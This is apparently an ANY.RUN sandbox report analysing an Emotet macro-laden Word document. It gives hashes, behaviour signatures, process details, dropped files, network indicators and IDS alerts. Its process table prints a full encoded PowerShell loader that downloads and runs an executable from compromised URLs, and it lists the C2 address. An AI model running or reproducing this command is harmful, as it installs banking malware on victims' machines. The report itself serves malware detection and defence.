analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

039475675722911139.doc

Full analysis: https://app.any.run/tasks/0d28777c-8304-4b89-8090-f8f6a51d54c4
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 14:23:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
loader
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: open-source, Subject: yellow, Author: Danielle Corkery, Keywords: focus group, Comments: Trail, Template: Normal.dotm, Last Saved By: Brenda Donnelly, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 07:26:00 2019, Last Saved Time/Date: Mon Oct 14 07:26:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 176, Security: 0
MD5:

A809AEA1C2D124F929CEB77CC67187A1

SHA1:

A768E0E7FFC3B8C137CB1E1AA60701C626B43AB0

SHA256:

07A87371066AAB8A4BBFE91B8902A7E7F105D6AC12E06BBEC1C2166797257F02

SSDEEP:

6144:CaxMddtPWuM/bDFtr6/DVokOe89/uvbuoh:CaSdtPWuMz6/KeyM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 798.exe (PID: 2528)
      • 798.exe (PID: 2952)
      • msptermsizes.exe (PID: 3796)
      • msptermsizes.exe (PID: 1416)
    • Emotet process was detected

      • 798.exe (PID: 2952)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 332)
    • Connects to CnC server

      • msptermsizes.exe (PID: 3796)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 332)
      • 798.exe (PID: 2952)
    • PowerShell script executed

      • powershell.exe (PID: 332)
    • Creates files in the user directory

      • powershell.exe (PID: 332)
    • Executed via WMI

      • powershell.exe (PID: 332)
    • Starts itself from another location

      • 798.exe (PID: 2952)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2524)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2524)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: open-source
Subject: yellow
Author: Danielle Corkery
Keywords: focus group
Comments: Trail
Template: Normal.dotm
LastModifiedBy: Brenda Donnelly
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:10:14 06:26:00
ModifyDate: 2019:10:14 06:26:00
Pages: 1
Words: 30
Characters: 176
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Wiza, Kirlin and Miller
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 205
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Kessler
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 798.exe no specs #EMOTET 798.exe msptermsizes.exe no specs msptermsizes.exe

Process information

PID
CMD
Path
Indicators
Parent process
2524"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\039475675722911139.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
332powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABhADIAZQBkADIAOQA1ADEANgA4ADIAMgBiAD0AJwBhADAAeAAzADYANwA2ADUAZQBjAGMAMgA4ACcAOwAkAGEAMAB4AGMAZABjADQAZgA0ADAAYQBhAGUAZQAxACAAPQAgACcANwA5ADgAJwA7ACQAYQAwAHgAYQBkADEANQA0ADkANwAyADMANwAwADAAYQA9ACcAYQAwAHgAMgBjADgAOQBmADYANwA2AGIAYQAzAGUANgBjACcAOwAkAGEAMAB4ADgANABhADMAMAA5AGIAMgA0ADYANABhADEAMQBhAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADAAeABjAGQAYwA0AGYANAAwAGEAYQBlAGUAMQArACcALgBlAHgAZQAnADsAJABhADAAeABmAGMAYgBjAGIAMQBkADcAZAAzADAAMwA9ACcAYQAwAHgANAA0ADYANwBmAGIANwAwADkAZgAyADYAJwA7ACQAYQAwAHgANgA3ADIAZABlAGUAZAAxAGEANwA3AGIAZgBmAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBCAGMAbABpAEUAbgB0ADsAJABhADAAeAAxAGEAZAA0AGIANQA2ADcAMwA4ADIAMAA0AD0AJwBoAHQAdABwADoALwAvAGMAbwBhAHMAdABhAGwAdABoAGUAcgBhAHAAeQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AYwBoAHoAMAB1ADkAMwA0ADcALwAqAGgAdAB0AHAAOgAvAC8AYgByAGEAbgBkAHMAbwBmAHoAYQBtAGIAaQBhAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwAwAHEAcwBzAGcAMwA4ADQAMQAvACoAaAB0AHQAcABzADoALwAvAGIAdQBzAGUAYQBjAHkAYwBsAGUALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBnAGsAMAA1ADYALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAG8AawBzAGwAaQBuAGsALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHAAawA5ADcAMAA5ADYALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGgAbwBsAGwAeQB3AG8AbwBkAGMAbAB1AGIALgB4AHkAegAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHUAYQA2ADcAdgAzADIAOAA4AC8AJwAuACIAUwBwAEwAYABJAFQAIgAoACcAKgAnACkAOwAkAGEAMAB4ADAAYgAwADYAZQA1ADEANABlAGEAOQAxAGYAMAA9ACcAYQAwAHgANgA0ADYANQA1AGYANwBlAGMAOQBhAGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGEAMAB4ADIAYgA1ADQAOAAyAGYAYgBiAGEAIABpAG4AIAAkAGEAMAB4ADEAYQBkADQAYgA1ADYANwAzADgAMgAwADQAKQB7AHQAcgB5AHsAJABhADAAeAA2ADcAMgBkAGUAZQBkADEAYQA3ADcAYgBmAGYALgAiAEQAbwBgAHcAbgBgAEwAbwBgAEEAZABmAEkATABlACIAKAAkAGEAMAB4ADIAYgA1ADQAOAAyAGYAYgBiAGEALAAgACQAYQAwAHgAOAA0AGEAMwAwADkAYgAyADQANgA0AGEAMQAxAGEAKQA7ACQAYQAwAHgAOQA0AGIAMgA2ADIAMwBhADUAYQA0AD0AJwBhADAAeABlAGMANwA0AGQAOABlAGYAMAA0ADEAMwAxAGEANAAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAbQAnACkAIAAkAGEAMAB4ADgANABhADMAMAA5AGIAMgA0ADYANABhADEAMQBhACkALgAiAEwAYABlAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADMANwA5ADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQBSAHQAIgAoACQAYQAwAHgAOAA0AGEAMwAwADkAYgAyADQANgA0AGEAMQAxAGEAKQA7ACQAYQAwAHgAMQAxADEANAA2AGMAOQA5ADgAYgBlAGMAMQA9ACcAYQAwAHgAYgBmAGQAYwAzADkANQAzAGEANABhAGQANQBlADEAJwA7AGIAcgBlAGEAawA7ACQAYQAwAHgAZgAxAGYAMwBhADkAOABmAGQAYgA1AGQAPQAnAGEAMAB4AGYANwA3ADEAYwA3ADcAOABiAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQAwAHgAYgBlADQAYQA2AGMAZQBkADAANgA2ADEANgA9ACcAYQAwAHgANgBlAGYANgBhADAAYgBlAGUANwBmACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2528"C:\Users\admin\798.exe" C:\Users\admin\798.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Exit code:
0
Version:
1, 0, 0, 1
2952--6b88d874C:\Users\admin\798.exe
798.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Exit code:
0
Version:
1, 0, 0, 1
1416"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe798.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Exit code:
0
Version:
1, 0, 0, 1
3796--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
msptermsizes.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Version:
1, 0, 0, 1
Total events
2 277
Read events
1 456
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA802.tmp.cvr
MD5:
SHA256:
332powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8N9539LC8O2NBJXZWAC9.temp
MD5:
SHA256:
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5D2D8A8.wmfwmf
MD5:3E5539508AB800FCE0DD2A4BEAF47C68
SHA256:926F43CC18B5E7B261C916D2C2AE4969075039DAB5D0BFB41307C66E425D5CF5
2524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:81A492AFD2C9EBFAD15F523EEDED4CFC
SHA256:56124FC6E95B7057A53C01944F70C4D5A01AB327E1D13B9531940941CFCF9350
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AE6CCF6.wmfwmf
MD5:A99E5BD8CBDCB059C57136F11E6A2BB9
SHA256:2BBA8C1F74A2437796CD13C246AE49ADAE7D2A8DC30AE836DBCFF462BE7743F7
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7033AB01.wmfwmf
MD5:BC418E525E43757B8BF915AE5762E191
SHA256:BD6E0F9412E116AC9997596F2E8741BE94D8F5011D8FB65190BC73CEA2F4DE03
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFCEA9E5.wmfwmf
MD5:EDB9DAF80D798631309421C0F0AF770A
SHA256:C01D9240067AA3E654DA293BCC9BC8BA30F5734369E0E28D4D725D826FDCDFEB
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA8A9700.wmfwmf
MD5:A40FC2DD4D5C3A3525F6A33374BC1054
SHA256:4C8B22BF89A9DC1A81DD536E8368C0D020B2F5EEE020C17CF92FF4CB3C282F39
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73EF1C74.wmfwmf
MD5:4EAB163B504AE1C0589894F9855DA003
SHA256:85A73D34BC5D14D1D125D484D52C253E8BF9E631C549353015624154F960F7A2
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67686C7F.wmfwmf
MD5:5EFBD00E0B3BE224567496BCA0CBDED0
SHA256:F8176CA69EFC866EE151717A84A35D8EC2B2C73733FE2120A9C6AD60C42AA25C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
332
powershell.exe
GET
200
50.28.1.57:80
http://coastaltherapy.com/wp-includes/chz0u9347/
US
executable
544 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3796
msptermsizes.exe
110.36.234.146:80
National WiMAX/IMS environment
PK
malicious
332
powershell.exe
50.28.1.57:80
coastaltherapy.com
Liquid Web, L.L.C
US
suspicious

DNS requests

Domain
IP
Reputation
coastaltherapy.com
  • 50.28.1.57
suspicious

Threats

PID
Process
Class
Message
332
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
332
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
332
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3796
msptermsizes.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 2
No debug info